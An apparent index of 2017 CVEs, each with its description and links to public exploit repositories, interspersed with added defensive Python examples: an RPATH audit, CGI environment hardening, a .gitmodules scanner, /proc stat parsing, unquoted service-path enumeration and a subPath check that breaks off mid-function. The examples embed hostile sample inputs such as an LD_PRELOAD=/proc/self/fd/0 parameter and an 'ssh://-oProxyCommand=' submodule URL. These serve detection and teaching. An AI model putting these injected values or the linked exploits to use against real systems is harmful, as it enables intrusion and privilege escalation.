elf/dl-load.c in the GNU C Library (aka glibc or libc6) 2.19 through 2.26 mishandles RPATH and RUNPATH containing $ORIGIN for a privileged (setuid or AT_SECURE) program, which allows local users to gain privileges via a Trojan horse library in the current working directory, related to the fillin_rpath and decompose_rpath functions. This is associated with misinterpretation of an empty RPATH/RUNPATH token as the "./" directory. NOTE: this configuration of RPATH/RUNPATH for a privileged program is apparently very uncommon; most likely, no such program is shipped with any common Linux distribution.

- [Xiami2012/CVE-2017-16997-poc](https://github.com/Xiami2012/CVE-2017-16997-poc)
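
An audit of a privileged binary's RPATH/RUNPATH from `readelf -d` output, as an added example that is not glibc code or the PoC above. It reports the two conditions the description names: an empty search-path element, which is searched as "./", and a `$ORIGIN` element in a setuid/AT_SECURE program, which on glibc 2.19 through 2.26 collapses to exactly such an empty element once the loader refuses to expand it. The `readelf` excerpt is constructed for a hypothetical setuid helper; the line format it assumes is the one `readelf -d` prints.

```python
import re

# Added example: RPATH/RUNPATH audit for CVE-2017-16997 conditions. Not glibc code.

RPATH_LINE = re.compile(r"\((RPATH|RUNPATH)\)\s+Library r(?:un)?path:\s+\[(.*)\]")


def extract_search_paths(readelf_dynamic_output):
    """[(tag, value)] for each RPATH/RUNPATH entry in `readelf -d` output."""
    return [(m.group(1), m.group(2)) for m in RPATH_LINE.finditer(readelf_dynamic_output)]


def audit_search_path(value, privileged):
    """Findings for one colon-separated RPATH/RUNPATH value."""
    findings = []
    for token in value.split(":"):
        if token == "":
            findings.append("empty element: searched as the current directory")
        elif "$ORIGIN" in token or "${ORIGIN}" in token:
            if privileged:
                findings.append(f"{token}: $ORIGIN in a privileged program; on glibc 2.19-2.26 "
                                "the refused element collapses to an empty one (CVE-2017-16997)")
        elif not token.startswith("/"):
            findings.append(f"{token}: relative element, resolved against the current directory")
    return findings


def audit_binary(readelf_dynamic_output, privileged):
    """{tag: findings} for every RPATH/RUNPATH entry of one binary."""
    return {tag: audit_search_path(value, privileged)
            for tag, value in extract_search_paths(readelf_dynamic_output)}


# Constructed `readelf -d` excerpt for a hypothetical setuid helper.
SAMPLE_READELF = """\
Dynamic section at offset 0x2d98 contains 27 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000000f (RPATH)              Library rpath: [$ORIGIN/../lib:/opt/app/lib]
 0x000000000000001d (RUNPATH)            Library runpath: [/usr/local/lib:]
"""

if __name__ == "__main__":
    for tag, findings in audit_binary(SAMPLE_READELF, privileged=True).items():
        for finding in findings:
            print(tag, "-", finding)
```

Run it over `readelf -d` for every file found by `find / -perm -4000 -type f` and for binaries carrying file capabilities; an unprivileged binary with `$ORIGIN` is ordinary and is deliberately not reported.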

### CVE-2017-17058 (2017-11-29)

The WooCommerce plugin through 3.x for WordPress has a Directory Traversal Vulnerability via a /wp-content/plugins/woocommerce/templates/emails/plain/ URI, which accesses a parent directory. NOTE: a software maintainer indicates that Directory Traversal is not possible because all of the template files have "if (!defined('ABSPATH')) {exit;}" code.

- [fu2x2000/CVE-2017-17058-woo_exploit](https://github.com/fu2x2000/CVE-2017-17058-woo_exploit)

### CVE-2017-17099 (2017-12-03)

There exists an unauthenticated SEH based Buffer Overflow vulnerability in the HTTP server of Flexense SyncBreeze Enterprise v10.1.16. When sending a GET request with an excessive length, it is possible for a malicious user to overwrite the SEH record and execute a payload that would run under the Windows SYSTEM account.

- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development)

### CVE-2017-17215 (2018-03-20)

Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.

- [1337g/CVE-2017-17215](https://github.com/1337g/CVE-2017-17215)
- [wilfred-wulbou/HG532d-RCE-Exploit](https://github.com/wilfred-wulbou/HG532d-RCE-Exploit)
- [ltfafei/HuaWei_Route_HG532_RCE_CVE-2017-17215](https://github.com/ltfafei/HuaWei_Route_HG532_RCE_CVE-2017-17215)

### CVE-2017-17275
- [kd992102/CVE-2017-17275](https://github.com/kd992102/CVE-2017-17275)

### CVE-2017-17309 (2018-06-14)

Huawei HG255s-10 V100R001C163B025SP02 has a path traversal vulnerability due to insufficient validation of the received HTTP requests, a remote attacker may access the local files on the device without authentication.

- [exploit-labs/huawei_hg255s_exploit](https://github.com/exploit-labs/huawei_hg255s_exploit)

### CVE-2017-17485 (2018-01-10)

FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.

- [tafamace/CVE-2017-17485](https://github.com/tafamace/CVE-2017-17485)
- [x7iaob/cve-2017-17485](https://github.com/x7iaob/cve-2017-17485)
- [Al1ex/CVE-2017-17485](https://github.com/Al1ex/CVE-2017-17485)

### CVE-2017-17562 (2017-12-12)

Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. This is a result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters in the cgiHandler function in cgi.c. When combined with the glibc dynamic linker, this behaviour can be abused for remote code execution using special parameter names such as LD_PRELOAD. An attacker can POST their shared object payload in the body of the request, and reference it using /proc/self/fd/0.

- [1337g/CVE-2017-17562](https://github.com/1337g/CVE-2017-17562)
- [ivanitlearning/CVE-2017-17562](https://github.com/ivanitlearning/CVE-2017-17562)
- [crispy-peppers/Goahead-CVE-2017-17562](https://github.com/crispy-peppers/Goahead-CVE-2017-17562)
- [nu11pointer/goahead-rce-exploit](https://github.com/nu11pointer/goahead-rce-exploit)
- [freitzzz/bash-CVE-2017-17562](https://github.com/freitzzz/bash-CVE-2017-17562)
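
The environment-construction mistake the description pins on cgiHandler, shown as an added, illustrative example that is not GoAhead's code. The vulnerable form copies request parameter names straight into the child's environment, so a parameter named LD_PRELOAD reaches the dynamic linker of the exec'd CGI program; the hardened form carries every parameter under a fixed prefix, so no request-controlled name can ever be one the loader honours. `BASE_ENV`, the `CGI_PARAM_` prefix and the request below are constructed for the demonstration.

```python
import re

# Added example (illustrative, not GoAhead's cgiHandler): verbatim versus
# namespaced copying of request parameters into a CGI child's environment.

BASE_ENV = {"PATH": "/usr/bin:/bin", "GATEWAY_INTERFACE": "CGI/1.1"}
LOADER_CONTROLLED = re.compile(r"^(LD_|DYLD_)|^GLIBC_TUNABLES$")  # ld.so / dyld / glibc knobs
SAFE_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def vulnerable_cgi_env(params):
    """Request parameter names become environment variable names, unfiltered."""
    env = dict(BASE_ENV)
    env.update(params)
    return env


def hardened_cgi_env(params):
    """Parameters travel under a fixed prefix, so they cannot collide with a
    loader- or libc-controlled variable. The final sweep is defence in depth
    in case BASE_ENV is ever extended from something less trustworthy."""
    env = dict(BASE_ENV)
    for name, value in params.items():
        if not SAFE_NAME.match(name):
            continue                      # drop names a shell or loader could misparse
        env["CGI_PARAM_" + name.upper()] = value
    return {k: v for k, v in env.items() if not LOADER_CONTROLLED.match(k)}


def loader_variables(env):
    """Names in env that ld.so/glibc would act on; an empty list means the env is clean."""
    return sorted(k for k in env if LOADER_CONTROLLED.match(k))


# Constructed request modelled on the attack described above: the POST body
# (the shared object) is referenced back through /proc/self/fd/0.
MALICIOUS_PARAMS = {"LD_PRELOAD": "/proc/self/fd/0", "name": "probe"}

if __name__ == "__main__":
    print("vulnerable:", loader_variables(vulnerable_cgi_env(MALICIOUS_PARAMS)))
    print("hardened:  ", loader_variables(hardened_cgi_env(MALICIOUS_PARAMS)))
```

A deny-list on `LD_` alone is the weaker fix: the prefix removes the whole class of collisions, including variables you have not thought of, and keeps the CGI program's view of the parameters unchanged apart from the prefix.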

### CVE-2017-17692 (2017-12-21)

Samsung Internet Browser 5.4.02.3 allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via crafted JavaScript code that redirects to a child tab and rewrites the innerHTML property.

- [specloli/CVE-2017-17692](https://github.com/specloli/CVE-2017-17692)

### CVE-2017-17736 (2018-03-23)

Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 allows remote attackers to obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.

- [0xSojalSec/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736](https://github.com/0xSojalSec/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736)

### CVE-2017-17917 (2017-12-29)

SQL injection vulnerability in the 'where' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id' parameter. NOTE: The vendor disputes this issue because the documentation states that this method is not intended for use with untrusted input.

- [matiasarenhard/rails-cve-2017-17917](https://github.com/matiasarenhard/rails-cve-2017-17917)

### CVE-2017-18019 (2018-01-04)

In K7 Total Security before 15.1.0.305, user-controlled input to the K7Sentry device is not sufficiently sanitized: the user-controlled input can be used to compare an arbitrary memory address with a fixed value, which in turn can be used to read the contents of arbitrary memory. Similarly, the product crashes upon a \\.\K7Sentry DeviceIoControl call with an invalid kernel pointer.

- [SpiralBL0CK/CVE-2017-18019](https://github.com/SpiralBL0CK/CVE-2017-18019)

### CVE-2017-18044 (2018-01-19)

A Command Injection issue was discovered in ContentStore/Base/CVDataPipe.dll in Commvault before v11 SP6. A certain message parsing function inside the Commvault service does not properly validate the input of an incoming string before passing it to CreateProcess. As a result, a specially crafted message can inject commands that will be executed on the target operating system. Exploitation of this vulnerability does not require authentication and can lead to SYSTEM level privilege on any system running the cvd daemon. This is a different vulnerability than CVE-2017-3195.

- [securifera/CVE-2017-18044-Exploit](https://github.com/securifera/CVE-2017-18044-Exploit)

### CVE-2017-18345 (2018-08-26)

The Joomanager component through 2.0.0 for Joomla! has an arbitrary file download issue, resulting in exposing the credentials of the database via an index.php?option=com_joomanager&controller=details&task=download&path=configuration.php request.

- [Luth1er/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD](https://github.com/Luth1er/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD)

### CVE-2017-18349 (2018-10-23)

parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.

- [h0cksr/Fastjson--CVE-2017-18349-](https://github.com/h0cksr/Fastjson--CVE-2017-18349-)

### CVE-2017-18486 (2019-08-09)

Jitbit Helpdesk before 9.0.3 allows remote attackers to escalate privileges because of mishandling of the User/AutoLogin userHash parameter. By inspecting the token value provided in a password reset link, a user can leverage a weak PRNG to recover the shared secret used by the server for remote authentication. The shared secret can be used to escalate privileges by forging new tokens for any user. These tokens can be used to automatically log in as the affected user.

- [Kc57/JitBit_Helpdesk_Auth_Bypass](https://github.com/Kc57/JitBit_Helpdesk_Auth_Bypass)

### CVE-2017-18635 (2019-09-25)

An XSS vulnerability was discovered in noVNC before 0.6.2 in which the remote VNC server could inject arbitrary HTML into the noVNC web page via the messages propagated to the status field, such as the VNC server name.

- [ShielderSec/CVE-2017-18635](https://github.com/ShielderSec/CVE-2017-18635)

### CVE-2017-20165 (2023-01-09)

A vulnerability was found in debug-js debug up to 3.0.x. It has been classified as problematic. Affected is the function useColors of the file src/node.js. Manipulating the argument str with unknown data leads to an inefficient regular expression complexity vulnerability. Upgrading to version 3.1.0 addresses this issue. The patch is identified as c38a0166c266a679c8de012d4eaccec3f944e685. It is recommended to upgrade the affected component.

- [fastify/send](https://github.com/fastify/send)

### CVE-2017-98505
- [mike-williams/Struts2Vuln](https://github.com/mike-williams/Struts2Vuln)

### CVE-2017-1000000
- [smythtech/DWF-CVE-2017-1000000](https://github.com/smythtech/DWF-CVE-2017-1000000)

### CVE-2017-1000004 (2017-07-13)

ATutor version 2.2.1 and earlier are vulnerable to a SQL injection in the Assignment Dropbox, BasicLTI, Blog Post, Blog, Group Course Email, Course Alumni, Course Enrolment, Group Membership, Course unenrolment, Course Enrolment List Search, Glossary, Social Group Member Search, Social Friend Search, Social Group Search, File Comment, Gradebook Test Title, User Group Membership, Inbox/Sent Items, Sent Messages, Links, Photo Album, Poll, Social Application, Social Profile, Test, Content Menu, Auto-Login, and Gradebook components resulting in information disclosure, database modification, or potential code execution.

- [yazan828/CVE-2017-1000004](https://github.com/yazan828/CVE-2017-1000004)

### CVE-2017-1000028 (2017-07-13)

Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.

- [NeonNOXX/CVE-2017-1000028](https://github.com/NeonNOXX/CVE-2017-1000028)

### CVE-2017-1000083 (2017-09-05)

backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince before 3.24.1 allows remote attackers to execute arbitrary commands via a .cbt file that is a TAR archive containing a filename beginning with a "--" command-line option substring, as demonstrated by a --checkpoint-action=exec=bash at the beginning of the filename.

- [matlink/evince-cve-2017-1000083](https://github.com/matlink/evince-cve-2017-1000083)
- [matlink/cve-2017-1000083-atril-nautilus](https://github.com/matlink/cve-2017-1000083-atril-nautilus)

### CVE-2017-1000112 (2017-10-04)

Linux kernel: Exploitable memory corruption due to UFO to non-UFO path switch. When building a UFO packet with MSG_MORE __ip_append_data() calls ip_ufo_append_data() to append. However in between two send() calls, the append path can be switched from UFO to non-UFO one, which leads to a memory corruption. In case UFO packet lengths exceeds MTU, copy = maxfraglen - skb->len becomes negative on the non-UFO path and the branch to allocate new skb is taken. This triggers fragmentation and computation of fraggap = skb_prev->len - maxfraglen. Fraggap can exceed MTU, causing copy = datalen - transhdrlen - fraggap to become negative. Subsequently skb_copy_and_csum_bits() writes out-of-bounds. A similar issue is present in IPv6 code. The bug was introduced in e89e9cf539a2 ("[IPv4/IPv6]: UFO Scatter-gather approach") on Oct 18 2005.

- [hikame/docker_escape_pwn](https://github.com/hikame/docker_escape_pwn)
- [ol0273st-s/CVE-2017-1000112-Adpated](https://github.com/ol0273st-s/CVE-2017-1000112-Adpated)
- [IT19083124/SNP-Assignment](https://github.com/IT19083124/SNP-Assignment)

### CVE-2017-1000117 (2017-10-04)

A malicious third-party can give a crafted "ssh://..." URL to an unsuspecting victim, and an attempt to visit the URL can result in any program that exists on the victim's machine being executed. Such a URL could be placed in the .gitmodules file of a malicious project, and an unsuspecting victim could be tricked into running "git clone --recurse-submodules" to trigger the vulnerability.

- [timwr/CVE-2017-1000117](https://github.com/timwr/CVE-2017-1000117)
- [Manouchehri/CVE-2017-1000117](https://github.com/Manouchehri/CVE-2017-1000117)
- [thelastbyte/CVE-2017-1000117](https://github.com/thelastbyte/CVE-2017-1000117)
- [alilangtest/CVE-2017-1000117](https://github.com/alilangtest/CVE-2017-1000117)
- [VulApps/CVE-2017-1000117](https://github.com/VulApps/CVE-2017-1000117)
- [greymd/CVE-2017-1000117](https://github.com/greymd/CVE-2017-1000117)
- [shogo82148/Fix-CVE-2017-1000117](https://github.com/shogo82148/Fix-CVE-2017-1000117)
- [sasairc/CVE-2017-1000117_wasawasa](https://github.com/sasairc/CVE-2017-1000117_wasawasa)
- [Shadow5523/CVE-2017-1000117-test](https://github.com/Shadow5523/CVE-2017-1000117-test)
- [ieee0824/CVE-2017-1000117](https://github.com/ieee0824/CVE-2017-1000117)
- [rootclay/CVE-2017-1000117](https://github.com/rootclay/CVE-2017-1000117)
- [ieee0824/CVE-2017-1000117-sl](https://github.com/ieee0824/CVE-2017-1000117-sl)
- [takehaya/CVE-2017-1000117](https://github.com/takehaya/CVE-2017-1000117)
- [ikmski/CVE-2017-1000117](https://github.com/ikmski/CVE-2017-1000117)
- [nkoneko/CVE-2017-1000117](https://github.com/nkoneko/CVE-2017-1000117)
- [chenzhuo0618/test](https://github.com/chenzhuo0618/test)
- [siling2017/CVE-2017-1000117](https://github.com/siling2017/CVE-2017-1000117)
- [Q2h1Cg/CVE-2017-1000117](https://github.com/Q2h1Cg/CVE-2017-1000117)
- [cved-sources/cve-2017-1000117](https://github.com/cved-sources/cve-2017-1000117)
- [leezp/CVE-2017-1000117](https://github.com/leezp/CVE-2017-1000117)
- [AnonymKing/CVE-2017-1000117](https://github.com/AnonymKing/CVE-2017-1000117)
- [Jerry-zhuang/CVE-2017-1000117](https://github.com/Jerry-zhuang/CVE-2017-1000117)
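
A check for the URL shape this issue abuses, as an added example that is not git's own code. The fixed git rejects ssh targets whose host, user or port begins with "-", because an unfixed git handed such a value to ssh as a command-line option (an `ssh://-oProxyCommand=...` URL being the known form) instead of a hostname; the functions below apply the same rule to `ssh://` URLs and to scp-like `[user@]host:path` targets, and scan a `.gitmodules` file for them. The `.gitmodules` content and the `touch%20pwned` payload are constructed for the demonstration.

```python
import re

# Added example: detect ssh targets that older git would pass to ssh as an
# option rather than a host (CVE-2017-1000117). Not git's own code.

SSH_SCHEMES = {"ssh", "git+ssh", "ssh+git"}


def _option_like(*fields):
    """True if any present field starts with '-', i.e. ssh would read it as an option."""
    return any(f is not None and f.startswith("-") for f in fields)


def _split_authority(authority):
    """Split [user@]host[:port]; a bracketed IPv6 literal stays whole as the host."""
    user = None
    if "@" in authority:
        user, authority = authority.rsplit("@", 1)
    host, port = authority, None
    if authority.startswith("[") and "]" in authority:
        end = authority.index("]")
        host, rest = authority[:end + 1], authority[end + 1:]
        port = rest[1:] if rest.startswith(":") else None
    elif ":" in authority:
        host, port = authority.rsplit(":", 1)
    return user, host, port


def is_option_like_ssh_url(url):
    """Flag ssh:// URLs and scp-like targets whose host, user or port begins with '-'."""
    if "://" in url:
        scheme, rest = url.split("://", 1)
        if scheme.lower() not in SSH_SCHEMES:
            return False
        return _option_like(*_split_authority(rest.split("/", 1)[0]))
    # scp-like syntax [user@]host:path: git treats it as an ssh target only
    # when the first colon comes before any slash.
    colon, slash = url.find(":"), url.find("/")
    if colon == -1 or (slash != -1 and slash < colon):
        return False
    user, host, _ = _split_authority(url[:colon])
    return _option_like(user, host)


def unsafe_submodule_urls(gitmodules_text):
    """URLs in a .gitmodules file that an unfixed git would hand to ssh as options."""
    urls = re.findall(r"^\s*url\s*=\s*(\S+)", gitmodules_text, re.MULTILINE)
    return [u for u in urls if is_option_like_ssh_url(u)]


# Constructed .gitmodules: one ordinary submodule and one carrying the
# ssh://-oProxyCommand=... form (hypothetical payload, space percent-encoded).
GITMODULES = """\
[submodule "lib"]
\tpath = lib
\turl = git@github.com:example/lib.git
[submodule "evil"]
\tpath = evil
\turl = ssh://-oProxyCommand=touch%20pwned/x
"""

if __name__ == "__main__":
    print(unsafe_submodule_urls(GITMODULES))
```

This is a pre-clone triage aid, not a substitute for a fixed git: the same option-like values can also arrive through a top-level remote URL or a `git-upload-pack` redirect, which the fixed git covers and this scanner does not.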

### CVE-2017-1000170 (2017-11-17)

jqueryFileTree 2.1.5 and older are vulnerable to directory traversal.

- [Nickguitar/Jquery-File-Tree-1.6.6-Path-Traversal](https://github.com/Nickguitar/Jquery-File-Tree-1.6.6-Path-Traversal)

### CVE-2017-1000250 (2017-09-12)

All versions of the SDP server in BlueZ 5.46 and earlier are vulnerable to an information disclosure vulnerability which allows remote attackers to obtain sensitive information from the bluetoothd process memory. This vulnerability lies in the processing of SDP search attribute requests.

- [olav-st/CVE-2017-1000250-PoC](https://github.com/olav-st/CVE-2017-1000250-PoC)

### CVE-2017-1000251 (2017-09-12)

The native Bluetooth stack in the Linux Kernel (BlueZ), starting at the Linux kernel version 2.6.32 and up to and including 4.13.1, is vulnerable to a stack overflow vulnerability in the processing of L2CAP configuration responses resulting in Remote code execution in kernel space.

- [hayzamjs/Blueborne-CVE-2017-1000251](https://github.com/hayzamjs/Blueborne-CVE-2017-1000251)
- [tlatkdgus1/blueborne-CVE-2017-1000251](https://github.com/tlatkdgus1/blueborne-CVE-2017-1000251)
- [own2pwn/blueborne-CVE-2017-1000251-POC](https://github.com/own2pwn/blueborne-CVE-2017-1000251-POC)
- [istanescu/CVE-2017-1000251_Exploit](https://github.com/istanescu/CVE-2017-1000251_Exploit)
- [sgxgsx/blueborne-CVE-2017-1000251](https://github.com/sgxgsx/blueborne-CVE-2017-1000251)

### CVE-2017-1000253 (2017-10-04)

Linux distributions that have not patched their long-term kernels with https://git.kernel.org/linus/a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (committed on April 14, 2015) are affected. This kernel vulnerability was fixed in April 2015 by commit a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to Linux 3.10.77 in May 2015), but it was not recognized as a security threat. With CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a normal top-down address allocation strategy, load_elf_binary() will attempt to map a PIE binary into an address range immediately below mm->mmap_base. Unfortunately, load_elf_binary() does not take account of the need to allocate sufficient space for the entire binary, which means that, while the first PT_LOAD segment is mapped below mm->mmap_base, the subsequent PT_LOAD segment(s) end up being mapped above mm->mmap_base into the area that is supposed to be the "gap" between the stack and the binary.

- [RicterZ/PIE-Stack-Clash-CVE-2017-1000253](https://github.com/RicterZ/PIE-Stack-Clash-CVE-2017-1000253)
- [sxlmnwb/CVE-2017-1000253](https://github.com/sxlmnwb/CVE-2017-1000253)

### CVE-2017-1000353 (2018-01-29)

Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.

- [vulhub/CVE-2017-1000353](https://github.com/vulhub/CVE-2017-1000353)
- [r00t4dm/Jenkins-CVE-2017-1000353](https://github.com/r00t4dm/Jenkins-CVE-2017-1000353)

### CVE-2017-1000367 (2017-06-05)

Todd Miller's sudo version 1.8.20 and earlier is vulnerable to an input validation flaw (embedded spaces) in the get_process_ttyname() function, resulting in information disclosure and command execution.

- [c0d3z3r0/sudo-CVE-2017-1000367](https://github.com/c0d3z3r0/sudo-CVE-2017-1000367)
- [homjxi0e/CVE-2017-1000367](https://github.com/homjxi0e/CVE-2017-1000367)
- [pucerpocok/sudo_exploit](https://github.com/pucerpocok/sudo_exploit)
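
The "embedded spaces" problem is in how /proc/[pid]/stat is parsed: the fields are space-separated, but field 2 (the command name, in parentheses) may itself contain spaces, so a process named with the right number of spaces can make whatever it likes appear as field 7 (tty_nr). The example below is added here and is not sudo's code: it contrasts a split-on-whitespace parse with one that skips past the last ')' first, on two constructed stat lines. sudo's own parser used strtol, so in the real attack the field only needs to start with digits; int() is used here for brevity.

```python
"""Added example: parsing tty_nr out of /proc/[pid]/stat.  Both lines below are
constructed for the demo, not captured from a machine."""

def tty_nr_naive(stat_line):
    """Split on whitespace and take field 7.  Correct only while the comm field
    (field 2, in parentheses) contains no spaces."""
    return int(stat_line.split()[6])

def tty_nr_robust(stat_line):
    """comm is the only field that may contain spaces or ')', and it ends at the
    last ')' on the line.  Skip past that, then count fields from there."""
    end = stat_line.rfind(")")
    if end < 0:
        raise ValueError("malformed stat line")
    rest = stat_line[end + 1:].split()   # rest[0] is field 3 (state)
    return int(rest[4])                  # field 7, tty_nr

def tty_major_minor(dev):
    """Decode the dev_t layout /proc uses for tty_nr into (major, minor)."""
    major = (dev >> 8) & 0xFFF
    minor = (dev & 0xFF) | ((dev >> 12) & 0xFFF00)
    return major, minor

# 34817 is (136, 1), i.e. /dev/pts/1.
NORMAL = ("4242 (sudo) S 4000 4242 4242 34817 4242 4194560 "
          "0 0 0 0 0 0 0 0 20 0 1 0 1000 0 0 0 0")
# The same process image started through a link named "a b c d e 999 z"
# (15 characters, the longest comm the kernel keeps).
TRICKY = ("4243 (a b c d e 999 z) S 4000 4243 4243 34817 4243 4194560 "
          "0 0 0 0 0 0 0 0 20 0 1 0 1000 0 0 0 0")

if __name__ == "__main__":
    for name, line in (("normal", NORMAL), ("tricky", TRICKY)):
        print(name, "naive:", tty_nr_naive(line), "robust:", tty_nr_robust(line),
              "->", tty_major_minor(tty_nr_robust(line)))
```

On the tricky line the naive parse returns the attacker's 999 while the robust one still returns 34817. The same rule (anchor on the last ')') applies to any tool that reads /proc/[pid]/stat, not just sudo.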

### CVE-2017-1000371 (2017-06-19)

The offset2lib patch as used by the Linux Kernel contains a vulnerability, if RLIMIT_STACK is set to RLIM_INFINITY and 1 Gigabyte of memory is allocated (the maximum under the 1/4 restriction) then the stack will be grown down to 0x80000000, and as the PIE binary is mapped above 0x80000000 the minimum distance between the end of the PIE binary's read-write segment and the start of the stack becomes small enough that the stack guard page can be jumped over by an attacker. This affects Linux Kernel version 4.11.5. This is a different issue than CVE-2017-1000370 and CVE-2017-1000365. This issue appears to be limited to i386 based systems.

- [Trinadh465/linux-4.1.15_CVE-2017-1000371](https://github.com/Trinadh465/linux-4.1.15_CVE-2017-1000371)

### CVE-2017-1000405 (2017-11-30)

The Linux Kernel versions 2.6.38 through 4.14 have a problematic use of pmd_mkdirty() in the touch_pmd() function inside the THP implementation. touch_pmd() can be reached by get_user_pages(). In such case, the pmd will become dirty. This scenario breaks the new can_follow_write_pmd()'s logic - pmd can become dirty without going through a COW cycle. This bug is not as severe as the original "Dirty cow" because an ext4 file (or any other regular file) cannot be mapped using THP. Nevertheless, it does allow us to overwrite read-only huge pages. For example, the zero huge page and sealed shmem files can be overwritten (since their mapping can be populated using THP). Note that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) thp.

- [bindecy/HugeDirtyCowPOC](https://github.com/bindecy/HugeDirtyCowPOC)

### CVE-2017-1000475 (2018-01-24)

FreeSSHd 1.3.1 is vulnerable to an unquoted service path, allowing local users to launch processes with elevated privileges.

- [lajarajorge/CVE-2017-1000475](https://github.com/lajarajorge/CVE-2017-1000475)
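
An unquoted service path is exploitable because CreateProcess tries every space-delimited prefix of the ImagePath (appending .exe where the prefix has no extension) before reaching the real executable. The example below is added here and is not part of the PoC above: given an ImagePath string as read from HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath, it lists the candidate files in the order Windows looks for them and the directories an attacker would have to write to. The FreeSSHd path used is made up for the demo, not the product's real install location.

```python
"""Added example: candidate executables for an unquoted service ImagePath."""
import ntpath

def unquoted_path_candidates(image_path):
    """Executable paths CreateProcess tries, in order.  A quoted path yields only
    itself; an unquoted one yields one candidate per space, with ".exe" added
    wherever the prefix has no extension."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        end = image_path.find('"', 1)
        return [image_path[1:end if end > 0 else None]]
    parts = image_path.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        cand = " ".join(parts[:i])
        if not ntpath.splitext(cand)[1]:
            cand += ".exe"
        candidates.append(cand)
    return candidates

def hijack_directories(image_path):
    """Directories that must be writable by a low-privileged user for one of the
    earlier candidates to be planted (every candidate except the real binary)."""
    cands = unquoted_path_candidates(image_path)
    return [ntpath.dirname(c) for c in cands[:-1]]

# Constructed ImagePath values for the demo (not FreeSSHd's actual install path).
UNQUOTED = r"C:\Program Files\Free SSHd\FreeSSHDService.exe"
QUOTED = '"' + UNQUOTED + '"'

if __name__ == "__main__":
    for c in unquoted_path_candidates(UNQUOTED):
        print("tries:", c)
    print("needs write access to one of:", hijack_directories(UNQUOTED))
    print("quoted form tries only:", unquoted_path_candidates(QUOTED))
```

The service is only exploitable if one of the listed directories is writable by the attacker; by default C:\ and C:\Program Files are not, so the audit step after this is an ACL check on each directory returned by hijack_directories(). Quoting the path in the registry removes every candidate but the real one.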

### CVE-2017-1000486 (2018-01-03)

Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution

- [pimps/CVE-2017-1000486](https://github.com/pimps/CVE-2017-1000486)
- [mogwailabs/CVE-2017-1000486](https://github.com/mogwailabs/CVE-2017-1000486)
- [cved-sources/cve-2017-1000486](https://github.com/cved-sources/cve-2017-1000486)
- [Pastea/CVE-2017-1000486](https://github.com/Pastea/CVE-2017-1000486)
- [oppsec/pwnfaces](https://github.com/oppsec/pwnfaces)
- [LongWayHomie/CVE-2017-1000486](https://github.com/LongWayHomie/CVE-2017-1000486)
- [jam620/primefaces](https://github.com/jam620/primefaces)

### CVE-2017-1000499 (2018-01-03)

phpMyAdmin versions 4.7.x (prior to 4.7.6.1/4.7.7) are vulnerable to a CSRF weakness. By deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables etc.

- [Villaquiranm/5MMISSI-CVE-2017-1000499](https://github.com/Villaquiranm/5MMISSI-CVE-2017-1000499)

### CVE-2017-1002101 (2018-03-13)

In Kubernetes versions 1.3.x, 1.4.x, 1.5.x, 1.6.x and prior to versions 1.7.14, 1.8.9 and 1.9.4 containers using subpath volume mounts with any volume type (including non-privileged pods, subject to file permissions) can access files/directories outside of the volume, including the host's filesystem.

- [bgeesaman/subpath-exploit](https://github.com/bgeesaman/subpath-exploit)
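
The subpath escape works because a symlink created inside the volume by the pod is followed when the subPath is mounted, so a check on the path string alone proves nothing about where the mount actually lands. The example below is added here and is not Kubernetes code or the PoC above: it plants such a symlink in a temporary "volume" and compares a string-only containment check with one that resolves the path first. The check shown is still racy on its own (the pod can swap the symlink between check and mount); the Kubernetes fix went further and walks the path component by component with O_NOFOLLOW before bind-mounting through the resulting file descriptor.

```python
"""Added example: string-level vs resolved containment checks for a subPath."""
import os
import tempfile

def naive_accepts(volume_root, sub_path):
    """Normalise the joined path and check the prefix.  Never touches the
    filesystem, so a symlink inside the volume pointing anywhere passes."""
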